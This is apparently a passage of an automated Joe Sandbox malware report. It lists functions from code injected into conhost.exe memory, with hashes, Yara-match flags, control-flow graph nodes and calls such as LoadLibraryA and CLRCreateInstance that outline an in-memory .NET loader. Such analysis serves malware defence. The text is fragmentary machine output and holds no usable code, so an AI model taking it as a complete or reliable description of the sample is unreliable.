                                                                                                                                                          • Opcode Fuzzy Hash: 3858bdd14f4e86fcebb238384309ec45571ddd1dc020c8d37960f120391ff5c3
                                                                                                                                                          • Instruction Fuzzy Hash: 74E19230908A4E8FEFA8EF28C8567E977E1EF54311F44427ED84DC7291DE78A9458B81
                                                                                                                                                          Function 00007FF7C14D0120 Relevance: 5.2, Strings: 4, Instructions: 216COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7$(7$07$07
                                                                                                                                                          • API String ID: 0-2090760396
                                                                                                                                                          • Opcode ID: 5b470d70df8177ad5391f00d7939003b3f76206515f52ab48b94f6c28c1e1d07
                                                                                                                                                          • Instruction ID: 353b99f02c4a1217f2e7b4e641088f81cf9443de126140ca1335919c4c443f17
                                                                                                                                                          • Opcode Fuzzy Hash: 5b470d70df8177ad5391f00d7939003b3f76206515f52ab48b94f6c28c1e1d07
                                                                                                                                                          • Instruction Fuzzy Hash: FA51F170A18A458FEB88EB2C8459679B7D1FF9E750F44067DE44EC7292CE64AC428741
                                                                                                                                                          Function 00007FF7C14D1211 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7$(7$07
                                                                                                                                                          • API String ID: 0-4208908032
                                                                                                                                                          • Opcode ID: cf7ebe9595bb48ad3c94ea021dba0d8f4a39edbe8ae1bd0a41f7b1bf7cbec79e
                                                                                                                                                          • Instruction ID: 38ac9373bb80cc029fc869ecdccd75454afacc5807bebcfa83395be79f559c20
                                                                                                                                                          • Opcode Fuzzy Hash: cf7ebe9595bb48ad3c94ea021dba0d8f4a39edbe8ae1bd0a41f7b1bf7cbec79e
                                                                                                                                                          • Instruction Fuzzy Hash: B351E370A0CA858FE788EB2C8459779B7E1FF9E750F4402BDE44EC7292DD68AC428751
                                                                                                                                                          Function 00000113DB11DEB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902440814-0
                                                                                                                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction ID: 99f6e06824e34cf13949a1f76bd70ee7a54e2ebb2b2e89afb77e2388a7d0d651
                                                                                                                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction Fuzzy Hash: BF81A131208B088FDB68EF78D888BE677E5FF95301F404A6DD49BC7159EA31E6498B41
                                                                                                                                                          Function 00007FF7C14D1519 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 87$6
                                                                                                                                                          • API String ID: 0-451483919
                                                                                                                                                          • Opcode ID: a1da54d94d30d444e69c1340cfa8d91aa2e07eb6ab2324c9040092a24f4049e0
                                                                                                                                                          • Instruction ID: ee8317dceed67ae5c8bbc095da29696bbd03a428c5dd8010da4c85dadbe5dd59
                                                                                                                                                          • Opcode Fuzzy Hash: a1da54d94d30d444e69c1340cfa8d91aa2e07eb6ab2324c9040092a24f4049e0
                                                                                                                                                          • Instruction Fuzzy Hash: 22515B31A08A858FE796FB38C4586797BE1FF87710F5C00B9D44AC71A3CE68A946C751
                                                                                                                                                          Function 00000113DB11D3BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 224 113db11d3ba-113db11d3dd LoadLibraryA 225 113db11d3e9-113db11d3fc 224->225 226 113db11d3df-113db11d3e4 224->226 229 113db11d4be 225->229 230 113db11d402-113db11d413 225->230 227 113db11d4c0-113db11d4d0 226->227 229->227 230->229 231 113db11d419-113db11d431 230->231 231->229 233 113db11d437-113db11d46b call 113db11f85e 231->233 233->229 238 113db11d46d-113db11d47e 233->238 238->229 239 113db11d480-113db11d497 238->239 239->229 241 113db11d499-113db11d4b9 call 113db11f85e 239->241 241->226
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction ID: c59f22ca7e00887ab798bdf71a69efe06071fc4ab5daedc385fcf0b6b3338ad4
                                                                                                                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction Fuzzy Hash: 3B31C03170CA084FEF5CAA69E8492EA73D5EBD8350F001169ED4BC328ED974EE0687C1
                                                                                                                                                          Function 00007FF7C14D0562 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: x6
                                                                                                                                                          • API String ID: 0-1066045226
                                                                                                                                                          • Opcode ID: 7dc1030c3015b0f7e6730720d79c8a047bb3e91965c18cf2f6b8a002c14ec418
                                                                                                                                                          • Instruction ID: faa873d9a40e40dc96f080918bc5f8e866f1248a59c5aa2e9f9ee4fc237b97df
                                                                                                                                                          • Opcode Fuzzy Hash: 7dc1030c3015b0f7e6730720d79c8a047bb3e91965c18cf2f6b8a002c14ec418
                                                                                                                                                          • Instruction Fuzzy Hash: C8C18E30A18A494FEB89FB38C45A668B7E1EF49355F5401B9D40ECB3A3CE26F941C791
                                                                                                                                                          Function 00000113DB11D2AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 321 113db11d2af-113db11d2c5 LoadLibraryA 322 113db11d2c7-113db11d2cc 321->322 323 113db11d2d1-113db11d2e4 321->323 324 113db11d3a8-113db11d3b8 322->324 326 113db11d3a6 323->326 327 113db11d2ea-113db11d2fb 323->327 326->324 327->326 328 113db11d301-113db11d319 327->328 328->326 330 113db11d31f-113db11d353 call 113db11f85e 328->330 330->326 335 113db11d355-113db11d366 330->335 335->326 336 113db11d368-113db11d37f 335->336 336->326 338 113db11d381-113db11d3a1 call 113db11f85e 336->338 338->322
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction ID: ea6f36659eff2f072071a3bcd6bdd1cbfb5cf1e0c12690212776bb4d1b91eeb4
                                                                                                                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction Fuzzy Hash: FE317031B18A084BDF5CFAA8A8556D973D6E7D8360F500269DD1BC72CDDE60DE058782
                                                                                                                                                          Function 00000113DB11D2A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 113db11d2a2-113db11d2c5 LoadLibraryA 344 113db11d2c7-113db11d2cc 342->344 345 113db11d2d1-113db11d2e4 342->345 346 113db11d3a8-113db11d3b8 344->346 348 113db11d3a6 345->348 349 113db11d2ea-113db11d2fb 345->349 348->346 349->348 350 113db11d301-113db11d319 349->350 350->348 352 113db11d31f-113db11d353 call 113db11f85e 350->352 352->348 357 113db11d355-113db11d366 352->357 357->348 358 113db11d368-113db11d37f 357->358 358->348 360 113db11d381-113db11d3a1 call 113db11f85e 358->360 360->344
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction ID: 9fe282f3cce851a095fba9d69679076dd77c6bc13a514cf27444144e0fcc77a0
                                                                                                                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction Fuzzy Hash: 9DE0D83160CA0D1FFB5CE5DEE84A7F666D8D7963B1F00006EE649C2105E045D9910391
                                                                                                                                                          Function 00007FF7C14D010D Relevance: 1.3, Strings: 1, Instructions: 2COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 364 7ff7c14d010d-7ff7c14d010e
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: x6
                                                                                                                                                          • API String ID: 0-1066045226
                                                                                                                                                          • Opcode ID: f581b6c3e1a85558846142e5c333133495e1a9fb60299a230a969cce4c8c5e75
                                                                                                                                                          • Instruction ID: cf793df85612a99b2b805e555a08728f4a6198ef4e651f30f44454a47a405960
                                                                                                                                                          • Opcode Fuzzy Hash: f581b6c3e1a85558846142e5c333133495e1a9fb60299a230a969cce4c8c5e75
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Function 00007FF7C14D0198 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 82552b1a06cf27bc0dfaabb2d89e713b01fa52b3a082f2fd05d70f9a3f714bf2
                                                                                                                                                          • Instruction ID: 80397b7bd6234e621df13e830d06ba3ecf220b8072da483f98da206dc73a5aea
                                                                                                                                                          • Opcode Fuzzy Hash: 82552b1a06cf27bc0dfaabb2d89e713b01fa52b3a082f2fd05d70f9a3f714bf2
                                                                                                                                                          • Instruction Fuzzy Hash: E6712432B481651BD700BB7CF85A7E97B90DF873BAB0841B7D18DCA2E3CD14A44682E1
                                                                                                                                                          Function 00007FF7C14D1092 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 644 7ff7c14d1092-7ff7c14d1099 645 7ff7c14d10a2-7ff7c14d10b3 644->645 646 7ff7c14d109b 644->646 647 7ff7c14d10b5 645->647 648 7ff7c14d10bc-7ff7c14d10cb 645->648 646->645 647->648 649 7ff7c14d10d4-7ff7c14d10e3 648->649 650 7ff7c14d10cd 648->650 651 7ff7c14d10e5 649->651 652 7ff7c14d10ec-7ff7c14d10fb 649->652 650->649 651->652 653 7ff7c14d1104-7ff7c14d1113 652->653 654 7ff7c14d10fd 652->654 655 7ff7c14d1115 653->655 656 7ff7c14d111c-7ff7c14d112b 653->656 654->653 655->656 657 7ff7c14d1134-7ff7c14d1143 656->657 658 7ff7c14d112d 656->658 659 7ff7c14d1145 657->659 660 7ff7c14d114c-7ff7c14d115b 657->660 658->657 659->660 661 7ff7c14d1164-7ff7c14d1173 660->661 662 7ff7c14d115d 660->662 663 7ff7c14d1175 661->663 664 7ff7c14d117c-7ff7c14d118b 661->664 662->661 663->664 665 7ff7c14d1194-7ff7c14d11a3 664->665 666 7ff7c14d118d 664->666 667 7ff7c14d11a5 665->667 668 7ff7c14d11ac-7ff7c14d11bb 665->668 666->665 667->668 669 7ff7c14d11c4-7ff7c14d11e2 668->669 670 7ff7c14d11bd 668->670 673 7ff7c14d11e9-7ff7c14d11ee call 7ff7c14d0120 669->673 670->669 675 7ff7c14d11f3-7ff7c14d120a 673->675
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f1dc2c3954e611147a4bc84936d583e8aecd067a602b79c307a0fb36fb25004c
                                                                                                                                                          • Instruction ID: ab03c7dbe678e1c2b6f58f201f5b88ced5412b3113765b26af93001ac426ca56
                                                                                                                                                          • Opcode Fuzzy Hash: f1dc2c3954e611147a4bc84936d583e8aecd067a602b79c307a0fb36fb25004c
                                                                                                                                                          • Instruction Fuzzy Hash: F751B22094E3C15FE347B334AC65A997FA16F83764F1D41EAE4C5CA4B3C6AA0585C722
                                                                                                                                                          Function 00007FF7C14D042C Relevance: .1, Instructions: 123COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1e520962596d83d1c9397f4637d6899b795ef4f67dbbc58b617f6c267fc87534
                                                                                                                                                          • Instruction ID: 3e14af7f45e61820ecda1d301a6eb8ddb724f62f84a8561d7752aa000c57f41c
                                                                                                                                                          • Opcode Fuzzy Hash: 1e520962596d83d1c9397f4637d6899b795ef4f67dbbc58b617f6c267fc87534
                                                                                                                                                          • Instruction Fuzzy Hash: C241922190DA884FEB95EB3888596B97BA1EF56311F5400BEC04CC72D3D9A9ED058762
                                                                                                                                                          Function 00007FF7C14D664A Relevance: .0, Instructions: 36COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fa0df40880cbd64152723ad9b5afa526168a7e59cc2ec10ebaca8047edaf49e4
                                                                                                                                                          • Instruction ID: a369d27e5dec4f3f70897dc7b6515f6c002c5b38644debe7c565ae5fdda3efe2
                                                                                                                                                          • Opcode Fuzzy Hash: fa0df40880cbd64152723ad9b5afa526168a7e59cc2ec10ebaca8047edaf49e4
                                                                                                                                                          • Instruction Fuzzy Hash: 5FF09621B2894949EF45BB2894C17FAB3A1EF60354F4481B5D44FCA3CBDD69A4068391
                                                                                                                                                          Function 00007FF7C14D11D0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 28dbd89eb79d6ee8faca584ae65b2fabaebfe108a6a55e3e52feb167d34d0190
                                                                                                                                                          • Instruction ID: 626dfadaec86dfdc7de818aa51012216bb2a1d57b22783d28f044e90a0d4dcb9
                                                                                                                                                          • Opcode Fuzzy Hash: 28dbd89eb79d6ee8faca584ae65b2fabaebfe108a6a55e3e52feb167d34d0190
                                                                                                                                                          • Instruction Fuzzy Hash: E3E08621B18C1D0F9A98F73D9455A69A2D2EBDC36075506B6E40CC3256DD68EC5183C1

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00007FF7C14D092F Relevance: 5.4, Strings: 4, Instructions: 439COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 6$6$6$6
                                                                                                                                                          • API String ID: 0-2957942223
                                                                                                                                                          • Opcode ID: e8858e054f5fcd40bd61d226c7ff006a01e23c7ee5edb12d29305414188c1d2a
                                                                                                                                                          • Instruction ID: b29f7fca34d89391e3f00fbecd3698a3e7e6c7f12cda036a09ef9e823ce5d792
                                                                                                                                                          • Opcode Fuzzy Hash: e8858e054f5fcd40bd61d226c7ff006a01e23c7ee5edb12d29305414188c1d2a
                                                                                                                                                          • Instruction Fuzzy Hash: A2D19E30A18A094FEB98FF38C455769B3E2EF89355F9401BAD40EC73A2CE65ED418791

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:9.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:21
                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                          execution_graph 2257 21e7b55d2af LoadLibraryA 2258 21e7b55d2c7 2257->2258 2259 21e7b55e106 2260 21e7b55e128 2259->2260 2261 21e7b55e254 LoadLibraryA 2260->2261 2262 21e7b55e269 2260->2262 2269 21e7b55e17c 2260->2269 2261->2260 2262->2269 2270 21e7b55e31d 2262->2270 2278 21e7b55d2a2 2262->2278 2264 21e7b55e2f3 2265 21e7b55e2f7 2264->2265 2271 21e7b55d3ba LoadLibraryA 2264->2271 2265->2264 2265->2269 2268 21e7b55e30c 2268->2269 2268->2270 2270->2269 2273 21e7b55deb2 2270->2273 2272 21e7b55d3df 2271->2272 2272->2268 2274 21e7b55def2 CLRCreateInstance 2273->2274 2276 21e7b55df0b 2273->2276 2274->2276 2275 21e7b55e0b2 2275->2269 2276->2275 2276->2276 2277 21e7b55e0a9 SafeArrayDestroy 2276->2277 2277->2275 2279 21e7b55d2af LoadLibraryA 2278->2279 2280 21e7b55d2c7 2279->2280 2280->2264

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000021E7B55E106 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 143 21e7b55e106-21e7b55e157 call 21e7b55f2de * 3 150 21e7b55e189 143->150 151 21e7b55e159-21e7b55e15c 143->151 152 21e7b55e18c-21e7b55e19d 150->152 151->150 153 21e7b55e15e-21e7b55e161 151->153 153->150 154 21e7b55e163-21e7b55e17a 153->154 156 21e7b55e19e-21e7b55e1c9 call 21e7b55f85e call 21e7b55f87e 154->156 157 21e7b55e17c-21e7b55e183 154->157 163 21e7b55e1cb-21e7b55e200 call 21e7b55f492 call 21e7b55f352 156->163 164 21e7b55e206-21e7b55e21d call 21e7b55f2de 156->164 157->150 159 21e7b55e185 157->159 159->150 163->164 175 21e7b55e462-21e7b55e473 163->175 164->150 169 21e7b55e223-21e7b55e224 164->169 171 21e7b55e22a-21e7b55e230 169->171 173 21e7b55e232 171->173 174 21e7b55e269-21e7b55e273 171->174 178 21e7b55e234-21e7b55e236 173->178 179 21e7b55e275-21e7b55e290 call 21e7b55f2de 174->179 180 21e7b55e2a1-21e7b55e2aa 174->180 176 21e7b55e475-21e7b55e47f 175->176 177 21e7b55e4a6-21e7b55e4c7 call 21e7b55f87e 175->177 176->177 181 21e7b55e481-21e7b55e49f call 21e7b55f87e 176->181 206 21e7b55e4cd-21e7b55e4cf 177->206 207 21e7b55e4c9 177->207 182 21e7b55e250-21e7b55e252 178->182 183 21e7b55e238-21e7b55e23e 178->183 179->175 199 21e7b55e296-21e7b55e29f 179->199 186 21e7b55e2c5-21e7b55e2c8 180->186 187 21e7b55e2ac-21e7b55e2b6 call 21e7b55d4d2 180->187 181->177 182->174 191 21e7b55e254-21e7b55e267 LoadLibraryA 182->191 183->182 190 21e7b55e240-21e7b55e24e 183->190 186->175 189 21e7b55e2ce-21e7b55e2d8 186->189 187->175 200 21e7b55e2bc-21e7b55e2c3 187->200 197 21e7b55e2e2-21e7b55e2e9 189->197 198 21e7b55e2da-21e7b55e2db 189->198 190->178 190->182 191->171 201 21e7b55e31d-21e7b55e321 197->201 202 21e7b55e2eb-21e7b55e2ec 197->202 198->197 199->179 199->180 200->197 208 21e7b55e3fd-21e7b55e405 201->208 209 21e7b55e327-21e7b55e349 201->209 205 21e7b55e2ee call 21e7b55d2a2 202->205 212 21e7b55e2f3-21e7b55e2f5 205->212 206->152 207->206 210 21e7b55e457-21e7b55e45d call 21e7b55e90e 208->210 211 21e7b55e407-21e7b55e40d 208->211 209->175 219 21e7b55e34f-21e7b55e369 call 21e7b55f85e 209->219 210->175 214 21e7b55e424-21e7b55e436 call 21e7b55deb2 211->214 215 21e7b55e40f-21e7b55e415 211->215 216 21e7b55e304-21e7b55e307 call 21e7b55d3ba 212->216 217 21e7b55e2f7-21e7b55e2fe 212->217 229 21e7b55e448-21e7b55e455 call 21e7b55d952 214->229 230 21e7b55e438-21e7b55e443 call 21e7b55e4d6 214->230 215->175 220 21e7b55e417-21e7b55e422 call 21e7b55ed6a 215->220 226 21e7b55e30c-21e7b55e30e 216->226 217->175 217->216 232 21e7b55e36b-21e7b55e36e 219->232 233 21e7b55e389-21e7b55e3b2 219->233 220->175 226->201 231 21e7b55e310-21e7b55e317 226->231 229->175 230->229 231->175 231->201 232->208 236 21e7b55e374-21e7b55e387 call 21e7b55f5e2 232->236 233->175 241 21e7b55e3b8-21e7b55e3f8 233->241 242 21e7b55e3fa-21e7b55e3fb 236->242 241->175 241->242 242->208
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction ID: a28049785033af0cf0f6daea1a0ec64e58c0cb964c1d76251fd3206026112adf
                                                                                                                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction Fuzzy Hash: FBC158302149099BFF79EA248C997FBF3D3FFA9302F554129D84AC61C5DA30E8539681
                                                                                                                                                          Function 00007FF7C14E50F6 Relevance: .5, Instructions: 470COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
